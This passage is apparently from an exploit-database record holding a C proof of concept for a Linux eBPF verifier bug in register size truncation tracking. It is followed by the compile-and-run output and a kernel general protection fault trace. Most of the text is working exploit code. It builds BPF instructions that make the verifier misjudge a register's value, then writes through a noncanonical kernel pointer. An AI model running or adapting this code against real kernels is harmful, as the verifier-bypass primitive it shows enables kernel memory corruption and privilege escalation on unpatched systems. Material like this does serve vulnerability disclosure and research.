SyS_read+0x130/0x130\r\n[10599.404125] ? 
lockdep_sys_exit+0x16/0x8e\r\n[10599.404129] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[10599.404133] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[10599.404138] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[10599.404200] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801ef6bf838\r\n[10599.404204] ---[ end trace e8c17e9abe81bd46 ]---\r\n======================================\r\n\r\n\r\n\r\n\r\n=== PoC for \"bpf: fix incorrect tracking of register size truncation\" ===\r\nHere is a crasher that uses this to again write to a noncanonical address:\r\n\r\n\r\n======================================\r\n#define _GNU_SOURCE\r\n#include <err.h>\r\n#include <stdint.h>\r\n#include <linux/bpf.h>\r\n#include <linux/filter.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <sys/syscall.h>\r\n#include <asm/unistd_64.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n\r\n/* start from kernel */\r\n#define BPF_EMIT_CALL(FUNC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_CALL, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = (FUNC) }) /* ??? 
*/\r\n#define BPF_MOV32_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_REG_ARG1 BPF_REG_1\r\n#define BPF_REG_ARG2 BPF_REG_2\r\n#define BPF_REG_ARG3 BPF_REG_3\r\n#define BPF_REG_ARG4 BPF_REG_4\r\n#define BPF_REG_ARG5 BPF_REG_5\r\n#define BPF_PSEUDO_MAP_FD 1\r\n#define BPF_LD_IMM64_RAW(DST, SRC, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LD | BPF_DW | BPF_IMM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = (__u32) (IMM) }), \\\r\n ((struct bpf_insn) { \\\r\n .code = 0, /* zero is reserved opcode */ \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = ((__u64) (IMM)) >> 32 })\r\n#define BPF_ALU32_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_LD_MAP_FD(DST, MAP_FD) \\\r\n BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)\r\n#define BPF_ALU32_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_EXIT_INSN() \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_EXIT, \\\r\n .dst_reg = 0, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* Memory store, *(uint *) (dst_reg + off16) = src_reg */\r\n#define BPF_STX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_REG_FP BPF_REG_10\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_ALU64_IMM(OP, DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = 
BPF_ALU64 | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_REG_TMP BPF_REG_8\r\n#define BPF_LDX_MEM(SIZE, DST, SRC, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = OFF, \\\r\n .imm = 0 })\r\n#define BPF_JMP_IMM(OP, DST, IMM, OFF) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_JMP | BPF_OP(OP) | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = OFF, \\\r\n .imm = IMM })\r\n#define BPF_MOV64_IMM(DST, IMM) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_MOV | BPF_K, \\\r\n .dst_reg = DST, \\\r\n .src_reg = 0, \\\r\n .off = 0, \\\r\n .imm = IMM })\r\n#define BPF_ALU64_REG(OP, DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU64 | BPF_OP(OP) | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n#define BPF_MOV32_REG(DST, SRC) \\\r\n ((struct bpf_insn) { \\\r\n .code = BPF_ALU | BPF_MOV | BPF_X, \\\r\n .dst_reg = DST, \\\r\n .src_reg = SRC, \\\r\n .off = 0, \\\r\n .imm = 0 })\r\n/* end from kernel */\r\n\r\n\r\nint bpf_(int cmd, union bpf_attr *attrs) {\r\n return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));\r\n}\r\n\r\nvoid array_set(int mapfd, uint32_t key, uint32_t value) {\r\n union bpf_attr attr = {\r\n .map_fd = mapfd,\r\n .key = (uint64_t)&key,\r\n .value = (uint64_t)&value,\r\n .flags = BPF_ANY,\r\n };\r\n\r\n\r\n int res = bpf_(BPF_MAP_UPDATE_ELEM, &attr);\r\n if (res)\r\n err(1, \"map update elem\");\r\n}\r\n\r\n\r\nint main(void) {\r\n union bpf_attr create_map_attrs = {\r\n .map_type = BPF_MAP_TYPE_ARRAY,\r\n .key_size = 4,\r\n .value_size = 8,\r\n .max_entries = 16\r\n };\r\n int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);\r\n 
if (mapfd == -1)\r\n err(1, \"map create\");\r\n\r\n\r\n array_set(mapfd, 1, 1);\r\n\r\n char verifier_log[100000];\r\n struct bpf_insn insns[] = {\r\n BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),\r\n\r\n // fill r3 with value in range [0x0, 0xf], actually 0x8:\r\n // first load map value pointer...\r\n BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),\r\n BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack\r\n BPF_MOV32_IMM(BPF_REG_ARG2, 1),\r\n BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),\r\n BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),\r\n BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),\r\n BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),\r\n BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit\r\n BPF_EXIT_INSN(), // exit\r\n\r\n // ... then write, read, mask map value\r\n // (tracing actual values through a map is impossible)\r\n BPF_MOV32_IMM(BPF_REG_3, 8),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_3, 0),\r\n BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),\r\n BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),\r\n\r\n // load r1=0xffff'fff8 while working around the first verifier bug\r\n BPF_MOV32_IMM(BPF_REG_1, 0xfffffff8>>1),\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_1),\r\n\r\n // r1 in range [0xffff'fff8, 0x1'0000'0007]\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_3),\r\n\r\n // load r2=0\r\n BPF_MOV32_IMM(BPF_REG_2, 0),\r\n\r\n // trigger verifier bug:\r\n // visible range: [0xffff'fff8, 0xffff'ffff]\r\n // hidden range: [0, 7]\r\n // actual value: 0\r\n BPF_ALU32_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),\r\n\r\n // collapse down: verifier sees 1, actual value 0\r\n BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 31),\r\n\r\n // flip: verifier sees 0, actual value 1\r\n BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),\r\n BPF_ALU64_IMM(BPF_MUL, BPF_REG_1, -1),\r\n\r\n // r1 = 0x1000'0000'0000'0000, verifier sees 0\r\n BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 60),\r\n\r\n // compute noncanonical pointer\r\n BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),\r\n\r\n // crash by writing to noncanonical pointer\r\n 
BPF_MOV32_IMM(BPF_REG_1, 0xdeadbeef),\r\n BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_1, 0),\r\n\r\n // terminate to make the verifier happy\r\n BPF_MOV32_IMM(BPF_REG_0, 0),\r\n BPF_EXIT_INSN()\r\n };\r\n union bpf_attr create_prog_attrs = {\r\n .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,\r\n .insn_cnt = sizeof(insns) / sizeof(insns[0]),\r\n .insns = (uint64_t)insns,\r\n .license = (uint64_t)\"\",\r\n .log_level = 2,\r\n .log_size = sizeof(verifier_log),\r\n .log_buf = (uint64_t)verifier_log\r\n };\r\n int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);\r\n if (progfd == -1) {\r\n perror(\"prog load\");\r\n puts(verifier_log);\r\n return 1;\r\n }\r\n puts(\"ok so far?\");\r\n\r\n int socks[2];\r\n if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))\r\n err(1, \"socketpair\");\r\n if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))\r\n err(1, \"setsockopt\");\r\n if (write(socks[1], \"a\", 1) != 1)\r\n err(1, \"write\");\r\n char c;\r\n if (read(socks[0], &c, 1) != 1)\r\n err(1, \"read res\");\r\n return 0;\r\n}\r\n[email\u00a0protected]:~/bpf_range$ gcc -o crasher_badtrunc crasher_badtrunc.c\r\n-Wall && ./crasher_badtrunc\r\nok so far?\r\nSegmentation fault\r\n======================================\r\n\r\n\r\nHere's the resulting crash:\r\n\r\n======================================\r\n[ 117.274571] general protection fault: 0000 [#2] SMP KASAN\r\n[ 117.274575] Modules linked in: binfmt_misc snd_hda_codec_generic\r\nqxl snd_hda_intel snd_hda_codec ttm snd_hda_core drm_kms_helper\r\nsnd_hwdep crct10dif_pclmul snd_pcm drm crc32_pclmul\r\nghash_clmulni_intel snd_timer pcbc aesni_intel aes_x86_64 snd\r\ncrypto_simd evdev glue_helper soundcore ppdev cryptd virtio_balloon sg\r\nvirtio_console serio_raw parport_pc parport pcspkr button ip_tables\r\nx_tables autofs4 ext4 crc16 mbcache jbd2 fscrypto sr_mod sd_mod cdrom\r\nata_generic 8139too ehci_pci virtio_pci crc32c_intel ata_piix uhci_hcd\r\npsmouse virtio_ring virtio floppy ehci_hcd libata usbcore 
scsi_mod\r\n8139cp i2c_piix4 mii\r\n[ 117.274640] CPU: 1 PID: 1197 Comm: crasher_badtrun Tainted: G B\r\nD 4.15.0-rc1+ #4\r\n[ 117.274642] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),\r\nBIOS 1.10.2-1 04/01/2014\r\n[ 117.274645] task: 00000000a02f12e8 task.stack: 0000000051644a73\r\n[ 117.274651] RIP: 0010:___bpf_prog_run+0x1a77/0x2490\r\n[ 117.274654] RSP: 0018:ffff8801af4e7838 EFLAGS: 00010292\r\n[ 117.274657] RAX: 0000000000000000 RBX: ffffc90001305108 RCX: ffffffff928483d7\r\n[ 117.274659] RDX: 0000000000000001 RSI: 0000000000000004 RDI: 0fff8801ac81e0f8\r\n[ 117.274661] RBP: ffff8801af4e7968 R08: 0000000000000000 R09: 0000000000000000\r\n[ 117.274664] R10: 0000000000000001 R11: ffffed003dfa0601 R12: ffffffff932be980\r\n[ 117.274666] R13: 1ffff10035e9cf0e R14: 00000000deadbeef R15: 0fff8801ac81e0f8\r\n[ 117.274669] FS: 00007f3efe927700(0000) GS:ffff8801f7640000(0000)\r\nknlGS:0000000000000000\r\n[ 117.274671] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\r\n[ 117.274674] CR2: 00005654507a9008 CR3: 00000001ec086003 CR4: 00000000001606e0\r\n[ 117.274678] Call Trace:\r\n[ 117.274685] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274688] ? bpf_jit_compile+0x30/0x30\r\n[ 117.274693] ? alloc_skb_with_frags+0x90/0x2c0\r\n[ 117.274697] ? __bpf_prog_run32+0x83/0xc0\r\n[ 117.274700] ? __bpf_prog_run64+0xc0/0xc0\r\n[ 117.274705] ? sk_filter_trim_cap+0x5c/0x4e0\r\n[ 117.274710] ? sk_filter_trim_cap+0xf7/0x4e0\r\n[ 117.274715] ? unix_dgram_sendmsg+0x3e2/0x960\r\n[ 117.274720] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274724] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274728] ? sock_alloc_inode+0x46/0x110\r\n[ 117.274731] ? unix_stream_connect+0x840/0x840\r\n[ 117.274734] ? __sock_create+0x7f/0x2c0\r\n[ 117.274737] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274742] ? __lock_acquire.isra.31+0x2d/0xb40\r\n[ 117.274746] ? __wake_up_common_lock+0xaf/0x130\r\n[ 117.274752] ? unix_stream_connect+0x840/0x840\r\n[ 117.274755] ? 
sock_sendmsg+0x6b/0x80\r\n[ 117.274759] ? sock_write_iter+0x11d/0x1d0\r\n[ 117.274762] ? sock_sendmsg+0x80/0x80\r\n[ 117.274768] ? do_raw_spin_unlock+0x86/0x120\r\n[ 117.274782] ? iov_iter_init+0x77/0xb0\r\n[ 117.274786] ? __vfs_write+0x23e/0x340\r\n[ 117.274799] ? kernel_read+0xa0/0xa0\r\n[ 117.274805] ? __fd_install+0x5/0x160\r\n[ 117.274809] ? __fget_light+0x9b/0xb0\r\n[ 117.274813] ? vfs_write+0xe9/0x240\r\n[ 117.274817] ? SyS_write+0xa7/0x130\r\n[ 117.274820] ? SyS_read+0x130/0x130\r\n[ 117.274823] ? lockdep_sys_exit+0x16/0x8e\r\n[ 117.274827] ? lockdep_sys_exit_thunk+0x16/0x2b\r\n[ 117.274831] ? entry_SYSCALL_64_fastpath+0x1e/0x86\r\n[ 117.274836] Code: 00 48 0f bf 43 fa 49 01 c7 0f b6 43 f9 c0 e8 04\r\n0f b6 c0 4c 8d 74 c5 00 4c 89 f7 e8 04 4a 0f 00 4d 8b 36 4c 89 ff e8\r\n79 49 0f 00 <45> 89 37 e9 17 e6 ff ff 48 8d 7b 01 e8 58 47 0f 00 0f b6\r\n43 01\r\n[ 117.274885] RIP: ___bpf_prog_run+0x1a77/0x2490 RSP: ffff8801af4e7838\r\n[ 117.274888] ---[ end trace e84b3275ee7b48c9 ]---\r\n======================================\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/29285", "cvss": {"score": 0.0, "vector": "NONE"}}]}